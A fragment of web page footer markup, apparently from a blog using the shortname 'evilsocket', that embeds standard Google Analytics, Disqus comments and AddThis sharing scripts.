        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-22026549-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'evilsocket';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4da572964da15ce9" async="async"></script>

